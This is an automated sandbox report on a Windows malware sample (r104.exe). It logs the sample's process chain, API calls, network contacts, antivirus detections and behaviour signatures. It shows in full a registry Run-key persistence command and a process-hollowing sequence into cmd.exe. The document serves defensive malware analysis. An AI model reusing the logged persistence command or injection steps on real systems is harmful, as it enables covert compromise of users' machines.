Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 2, 2021, 10:35 a.m.	April 2, 2021, 10:45 a.m.

Size	367.5KB
Type	PE32+ executable (console) x86-64, for MS Windows
MD5	`d2749c21fa8671e75cd147380ff110e0`
SHA256	`3dbab512123a36954684474e9a9f5502aa9edf0228a4df8f0cb33e328890d33b`
CRC32	`54565859`
ssdeep	`6144:BABatTx4LuLbY0xtTZrLRcBDrh15kk5XvI9eNtlhzQKOR64sWkxfkEW5sX2Lg:qc4utt95cBX8ejWT9kvW5s`
Yara	PE_Header_Zero - PE File Signature Zero OS_Processor_Check_Zero - OS Processor Check Signature Zero win_files_operation - Affect private profile IsPE64 - (no description) IsConsole - (no description) HasDebugData - DebugData Check HasRichSignature - Rich Signature Check

r104.exe "C:\Users\test22\AppData\Local\Temp\r104.exe"
8212
- cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\r104.exe VVWDQI5
  3172
  - PING.EXE ping 8.8.7.7 -n 2
    7400
  - r104.exe C:\Users\test22\AppData\Local\Temp\r104.exe VVWDQI5
    8152
    - cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NHXU1K
      3916
      - PING.EXE ping 8.8.7.7 -n 2
        4404
      - RT4315F.exe C:\Users\test22\AppData\Local\Temp\RT4315F.exe NHXU1K
        8636
        
        cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE
        4104
        
        PING.EXE ping 8.8.7.7 -n 2
        2736
        
        RT4315F.exe C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE
        6708
        
        cmd.exe cmd.exe
        5012

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
172.217.25.14	Active	Moloch
34.212.193.150	Active	Moloch
8.8.7.7	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameA April 2, 2021, 10:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 2, 2021, 10:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 2, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 2, 2021, 10:29 a.m.	computer_name: TEST22-PC	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 2, 2021, 10:35 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET https://34.212.193.150/kenichi/aura20b/zero21

Performs some HTTP requests (1 event)

request

GET https://34.212.193.150/kenichi/aura20b/zero21

Allocates read-write-execute memory (usually to unpack itself) (6 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 2, 2021, 10:35 a.m.	process_identifier: 8212 region_size: 143360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:35 a.m.	process_identifier: 8152 region_size: 143360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:29 a.m.	process_identifier: 8636 region_size: 143360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:29 a.m.	process_identifier: 6708 region_size: 143360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 2, 2021, 10:29 a.m.	process_identifier: 6708 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077219000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 2, 2021, 10:29 a.m.	process_identifier: 6708 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077218000 process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\RT4315F.exe

Creates a suspicious process (1 event)

cmdline

cmd.exe

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW April 2, 2021, 10:35 a.m.	thread_identifier: 7724 thread_handle: 0x00000000000000c0 process_identifier: 3172 current_directory: filepath: track: 1 command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\r104.exe VVWDQI5 filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000c4	1	1
CreateProcessInternalW April 2, 2021, 10:36 a.m.	thread_identifier: 4772 thread_handle: 0x00000000000000bc process_identifier: 3916 current_directory: filepath: track: 1 command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NHXU1K filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000c0	1	1
CreateProcessInternalW April 2, 2021, 10:29 a.m.	thread_identifier: 3080 thread_handle: 0x00000000000000c0 process_identifier: 4104 current_directory: filepath: track: 1 command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000c4	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (15 events)

Time & API	Arguments	Status	Return
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: SearchIndexer.exe process_identifier: 2548	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: thunderbird.exe process_identifier: 3960	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: pw.exe process_identifier: 5008	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: audiodg.exe process_identifier: 7936	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: splwow64.exe process_identifier: 3928	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: SearchProtocolHost.exe process_identifier: 3816	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: SearchFilterHost.exe process_identifier: 7776	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: mobsync.exe process_identifier: 3220	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: pw.exe process_identifier: 5952	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: taskhost.exe process_identifier: 4044	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: slui.exe process_identifier: 5904	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: cmd.exe process_identifier: 7180	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: conhost.exe process_identifier: 8024	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: r104.exe process_identifier: 8212	1	1
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000b0 process_name: pw.exe process_identifier: 652	1	1

File has been identified by 6 AntiVirus engines on VirusTotal as malicious (6 events)

APEX	Malicious
Paloalto	generic.ml
Kaspersky	UDS:DangerousObject.Multi.Generic
Avast	FileRepMetagen [Malware]
Kingsoft	Win32.Hack.Undef.(kcloud)
AVG	FileRepMetagen [Malware]

Yara rule detected in process memory (13 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Create a windows service	rule	create_service
description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Create a windows service	rule	create_service
description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Create a windows service	rule	create_service

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	ping 8.8.7.7 -n 2
cmdline	cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NHXU1K
cmdline	cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE
cmdline	cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\r104.exe VVWDQI5

Communicates with host for which no DNS query was performed (3 events)

host	172.217.25.14
host	34.212.193.150
host	8.8.7.7

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory April 2, 2021, 10:29 a.m.	process_identifier: 5012 region_size: 139264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000004a720000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000118	1	0	0

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\L6BC9S31KAU

reg_value

cmd.exe /c reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v J7VKJT64 /t REG_SZ /d "C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE" & start "H" C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\RT4315F.exe

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory April 2, 2021, 10:29 a.m.	buffer: MZÿÿ¸@Øº´ Í!¸LÍ!This program cannot be run in DOS mode. $Ôâÿ×µ¬×µ¬×µ¬õÕÖµ¬õÕÒµ¬×µ¬Åµ¬×µ¬Äµ¬@ëÖµ¬Rich×µ¬PEd9e`ð"Î$Ô!rJ ` p°à.textÊÍÎ `.rdataàÒ@@.dataÂðÚ@À.pdatapÜ@@ base_address: 0x000000004a720000 process_identifier: 5012 process_handle: 0x0000000000000118	1	1
WriteProcessMemory April 2, 2021, 10:29 a.m.	buffer: ErrCodeid%d&=ABCDEFGHIJKLMNOPQRTSUVWXYZ0123456789¦ÜsÏMªK.$¥à¤Â$WN/ó_ÙåÓLòøE:ÐªK.$9e` b0p`àR 10P p `ÀÐàð E0P p `ÀÐàðb0Pp`àð ¢0P p `ÀÐàðbp` b0P p `ÀÐàð 0Pp`à W0P p `ÀÐàð 0P p `ÀÐàð¢0Pp`àð 0P p `ÀÐàð"0Pp`àð 0P p `ÀÐàð 0Pp`à 0P p `ÀÐàðÒ0p` =0P p `ÀÐàð â0P p `ÀÐàð 0P p `ÀÐàð '0P p `ÀÐàð0p`p`20p`B 0P p `ÀÐàð 0P p `ÀÐàðh+0P p `ÀÐàð"` 50P p `ÀÐàð R0P p `ÀÐàð B0p`à 0 Pp`Ààðh 0P p `ÀÐàð 0P p `ÀÐàðR0p`b0Pp` 0P p `ÀÐàð Â0P p `ÀÐàðh;0P p `ÀÐàð 0P p `ÀÐàðR`Âp`"0Pp`0Pp` "0Pp`à"0p`R 0 Pp`Ààð R0Pp`à0p`Bp`2` 00Pp`àhâ0P p `ÀÐàðh70P p `ÀÐàðh#0P p `ÀÐàð r0Pp`à p` %0P p `ÀÐàð p` p` ¢0p`à B 0p`Ààð O0P p `ÀÐàð0Pp` +0P p `ÀÐàðr` 0p`à ó0P p `ÀÐàð base_address: 0x000000004a73e000 process_identifier: 5012 process_handle: 0x0000000000000118	1	1
WriteProcessMemory April 2, 2021, 10:29 a.m.	buffer: base_address: 0x000000004a73f000 process_identifier: 5012 process_handle: 0x0000000000000118	1	1
WriteProcessMemory April 2, 2021, 10:29 a.m.	buffer: ÃÌàÃPÔàPäàÒ!ìàÜ!MáP¤+á¤+-0á-¦-Há¦-G0ÜãG0¾1Tá¾1 6Üã 66lá6(;ã(;_\|á_¥dá¥dhPâh,j¬á,jyÀáy2{Tá2{ ~Øá ~ºìáºÚâÚnânâhââÉ,âÉ\¡8â\¡¶¨á¶¨¹«Pâ¹«hâÌ²ãÌ²ÉâÉÍÄãÍ ÔÄå Ô0Õâ0ÕÇÕ(äÇÕJÖ¤âJÖÖÖ¤âÖÖ¿Ø`ã¿ØÜÜìáÜÜNÝ°âNÝ]ÞHá`Þá0áá)á¼â)áÀêÄâÀêìÌàìóÜâóeö0áeö_ÿôâ`ÿã¼â¨tãtH0ãH8ãÓPãÓz`ãz!tã!ç!Pãç!Û'PâÜ'æ+ãæ+.Üã.´.¨ã´./´ã/Ù3ÄãÙ3Ô5ÜãÔ5GôãGHäHüH(äüHxI0ãxIFJ0äJ±Ktä±K~L<ä~LøMDäøMÀPÜãÀP³RTä´RSâS}Tdä}TFVtäFVÌV°âÌVÍWäÍWÃXäÃXUY¤äUY¿Y°ä¿YøY¼äøYØ[TáØ[ÕaÄäÕa#eØä#e¾gÜã¾gqôäqëvåëvÎw,åÎwx,åx{y,å{y_}ìá_}~<å~°Hå°`å¶lå¶vxåvå0¬å0¬®Üã®±8ã±b±¼âb±þ²´åþ²QµÄåQµ)¸0á)¸?»Pâ?»<Áã<ÁÔÂTáÔÂqÉÜåqÉ»É¨ã»ÉÊ¨ãÊJÊPãLÊËäåËêÏPâêÏÉÝôå base_address: 0x000000004a741000 process_identifier: 5012 process_handle: 0x0000000000000118	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory April 2, 2021, 10:29 a.m.	buffer: MZÿÿ¸@Øº´ Í!¸LÍ!This program cannot be run in DOS mode. $Ôâÿ×µ¬×µ¬×µ¬õÕÖµ¬õÕÒµ¬×µ¬Åµ¬×µ¬Äµ¬@ëÖµ¬Rich×µ¬PEd9e`ð"Î$Ô!rJ ` p°à.textÊÍÎ `.rdataàÒ@@.dataÂðÚ@À.pdatapÜ@@ base_address: 0x000000004a720000 process_identifier: 5012 process_handle: 0x0000000000000118	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 6708 called NtSetContextThread to modify thread in remote process 5012
NtSetContextThread April 2, 2021, 10:29 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 1248993748 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 1636760 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 1998505216 registers.rdx: 8796092887040 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x00000000000000d4 process_identifier: 5012	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3172 resumed a thread in remote process 8152
Process injection	Process 3916 resumed a thread in remote process 8636
Process injection	Process 4104 resumed a thread in remote process 6708
Process injection	Process 6708 resumed a thread in remote process 5012
NtResumeThread April 2, 2021, 10:35 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 8152	1	0	0
NtResumeThread April 2, 2021, 10:29 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 8636	1	0	0
NtResumeThread April 2, 2021, 10:29 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 6708	1	0	0
NtResumeThread April 2, 2021, 10:29 a.m.	thread_handle: 0x00000000000000d4 suspend_count: 1 process_identifier: 5012	1	0	0

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (26 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW April 2, 2021, 10:35 a.m.	thread_identifier: 7724 thread_handle: 0x00000000000000c0 process_identifier: 3172 current_directory: filepath: track: 1 command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\r104.exe VVWDQI5 filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000c4	1	1
CreateProcessInternalW April 2, 2021, 10:35 a.m.	thread_identifier: 1472 thread_handle: 0x0000000000000060 process_identifier: 7400 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\PING.EXE track: 1 command_line: ping 8.8.7.7 -n 2 filepath_r: C:\Windows\system32\PING.EXE stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW April 2, 2021, 10:35 a.m.	thread_identifier: 4716 thread_handle: 0x0000000000000064 process_identifier: 8152 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\r104.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\r104.exe VVWDQI5 filepath_r: C:\Users\test22\AppData\Local\Temp\r104.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1
NtResumeThread April 2, 2021, 10:35 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 8152	1	0
NtResumeThread April 2, 2021, 10:35 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 7400	1	0
CreateProcessInternalW April 2, 2021, 10:36 a.m.	thread_identifier: 4772 thread_handle: 0x00000000000000bc process_identifier: 3916 current_directory: filepath: track: 1 command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NHXU1K filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000c0	1	1
CreateProcessInternalW April 2, 2021, 10:28 a.m.	thread_identifier: 7552 thread_handle: 0x0000000000000060 process_identifier: 4404 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\PING.EXE track: 1 command_line: ping 8.8.7.7 -n 2 filepath_r: C:\Windows\system32\PING.EXE stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW April 2, 2021, 10:29 a.m.	thread_identifier: 9100 thread_handle: 0x0000000000000064 process_identifier: 8636 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\RT4315F.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\RT4315F.exe NHXU1K filepath_r: C:\Users\test22\AppData\Local\Temp\RT4315F.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1
NtResumeThread April 2, 2021, 10:29 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 8636	1	0
NtResumeThread April 2, 2021, 10:28 a.m.	thread_handle: 0x00000000000000bc suspend_count: 1 process_identifier: 4404	1	0
CreateProcessInternalW April 2, 2021, 10:29 a.m.	thread_identifier: 3080 thread_handle: 0x00000000000000c0 process_identifier: 4104 current_directory: filepath: track: 1 command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000c4	1	1
CreateProcessInternalW April 2, 2021, 10:29 a.m.	thread_identifier: 3632 thread_handle: 0x0000000000000060 process_identifier: 2736 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\PING.EXE track: 1 command_line: ping 8.8.7.7 -n 2 filepath_r: C:\Windows\system32\PING.EXE stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW April 2, 2021, 10:29 a.m.	thread_identifier: 2860 thread_handle: 0x0000000000000064 process_identifier: 6708 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\RT4315F.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\RT4315F.exe NICE filepath_r: C:\Users\test22\AppData\Local\Temp\RT4315F.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1
NtResumeThread April 2, 2021, 10:29 a.m.	thread_handle: 0x0000000000000064 suspend_count: 0 process_identifier: 6708	1	0
NtResumeThread April 2, 2021, 10:29 a.m.	thread_handle: 0x00000000000000bc suspend_count: 1 process_identifier: 2736	1	0
CreateProcessInternalW April 2, 2021, 10:29 a.m.	thread_identifier: 3864 thread_handle: 0x00000000000000d4 process_identifier: 5012 current_directory: filepath: track: 1 command_line: cmd.exe filepath_r: stack_pivoted: 0 creation_flags: 20 (CREATE_NEW_CONSOLE\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000000000000118	1	1
NtGetContextThread April 2, 2021, 10:29 a.m.	thread_handle: 0x00000000000000d4	1	0
NtUnmapViewOfSection April 2, 2021, 10:29 a.m.	base_address: 0x000000004a720000 region_size: 4096 process_identifier: 5012 process_handle: 0x0000000000000118	1	0
NtAllocateVirtualMemory April 2, 2021, 10:29 a.m.	process_identifier: 5012 region_size: 139264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000004a720000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000118	1	0
WriteProcessMemory April 2, 2021, 10:29 a.m.	buffer: MZÿÿ¸@Øº´ Í!¸LÍ!This program cannot be run in DOS mode. $Ôâÿ×µ¬×µ¬×µ¬õÕÖµ¬õÕÒµ¬×µ¬Åµ¬×µ¬Äµ¬@ëÖµ¬Rich×µ¬PEd9e`ð"Î$Ô!rJ ` p°à.textÊÍÎ `.rdataàÒ@@.dataÂðÚ@À.pdatapÜ@@ base_address: 0x000000004a720000 process_identifier: 5012 process_handle: 0x0000000000000118	1	1
WriteProcessMemory April 2, 2021, 10:29 a.m.	buffer: base_address: 0x000000004a721000 process_identifier: 5012 process_handle: 0x0000000000000118	1	1
WriteProcessMemory April 2, 2021, 10:29 a.m.	buffer: ErrCodeid%d&=ABCDEFGHIJKLMNOPQRTSUVWXYZ0123456789¦ÜsÏMªK.$¥à¤Â$WN/ó_ÙåÓLòøE:ÐªK.$9e` b0p`àR 10P p `ÀÐàð E0P p `ÀÐàðb0Pp`àð ¢0P p `ÀÐàðbp` b0P p `ÀÐàð 0Pp`à W0P p `ÀÐàð 0P p `ÀÐàð¢0Pp`àð 0P p `ÀÐàð"0Pp`àð 0P p `ÀÐàð 0Pp`à 0P p `ÀÐàðÒ0p` =0P p `ÀÐàð â0P p `ÀÐàð 0P p `ÀÐàð '0P p `ÀÐàð0p`p`20p`B 0P p `ÀÐàð 0P p `ÀÐàðh+0P p `ÀÐàð"` 50P p `ÀÐàð R0P p `ÀÐàð B0p`à 0 Pp`Ààðh 0P p `ÀÐàð 0P p `ÀÐàðR0p`b0Pp` 0P p `ÀÐàð Â0P p `ÀÐàðh;0P p `ÀÐàð 0P p `ÀÐàðR`Âp`"0Pp`0Pp` "0Pp`à"0p`R 0 Pp`Ààð R0Pp`à0p`Bp`2` 00Pp`àhâ0P p `ÀÐàðh70P p `ÀÐàðh#0P p `ÀÐàð r0Pp`à p` %0P p `ÀÐàð p` p` ¢0p`à B 0p`Ààð O0P p `ÀÐàð0Pp` +0P p `ÀÐàðr` 0p`à ó0P p `ÀÐàð base_address: 0x000000004a73e000 process_identifier: 5012 process_handle: 0x0000000000000118	1	1
WriteProcessMemory April 2, 2021, 10:29 a.m.	buffer: base_address: 0x000000004a73f000 process_identifier: 5012 process_handle: 0x0000000000000118	1	1
WriteProcessMemory April 2, 2021, 10:29 a.m.	buffer: ÃÌàÃPÔàPäàÒ!ìàÜ!MáP¤+á¤+-0á-¦-Há¦-G0ÜãG0¾1Tá¾1 6Üã 66lá6(;ã(;_\|á_¥dá¥dhPâh,j¬á,jyÀáy2{Tá2{ ~Øá ~ºìáºÚâÚnânâhââÉ,âÉ\¡8â\¡¶¨á¶¨¹«Pâ¹«hâÌ²ãÌ²ÉâÉÍÄãÍ ÔÄå Ô0Õâ0ÕÇÕ(äÇÕJÖ¤âJÖÖÖ¤âÖÖ¿Ø`ã¿ØÜÜìáÜÜNÝ°âNÝ]ÞHá`Þá0áá)á¼â)áÀêÄâÀêìÌàìóÜâóeö0áeö_ÿôâ`ÿã¼â¨tãtH0ãH8ãÓPãÓz`ãz!tã!ç!Pãç!Û'PâÜ'æ+ãæ+.Üã.´.¨ã´./´ã/Ù3ÄãÙ3Ô5ÜãÔ5GôãGHäHüH(äüHxI0ãxIFJ0äJ±Ktä±K~L<ä~LøMDäøMÀPÜãÀP³RTä´RSâS}Tdä}TFVtäFVÌV°âÌVÍWäÍWÃXäÃXUY¤äUY¿Y°ä¿YøY¼äøYØ[TáØ[ÕaÄäÕa#eØä#e¾gÜã¾gqôäqëvåëvÎw,åÎwx,åx{y,å{y_}ìá_}~<å~°Hå°`å¶lå¶vxåvå0¬å0¬®Üã®±8ã±b±¼âb±þ²´åþ²QµÄåQµ)¸0á)¸?»Pâ?»<Áã<ÁÔÂTáÔÂqÉÜåqÉ»É¨ã»ÉÊ¨ãÊJÊPãLÊËäåËêÏPâêÏÉÝôå base_address: 0x000000004a741000 process_identifier: 5012 process_handle: 0x0000000000000118	1	1
NtSetContextThread April 2, 2021, 10:29 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 1248993748 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 1636760 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 1998505216 registers.rdx: 8796092887040 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x00000000000000d4 process_identifier: 5012	1	0
NtResumeThread April 2, 2021, 10:29 a.m.	thread_handle: 0x00000000000000d4 suspend_count: 1 process_identifier: 5012	1	0

r104.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All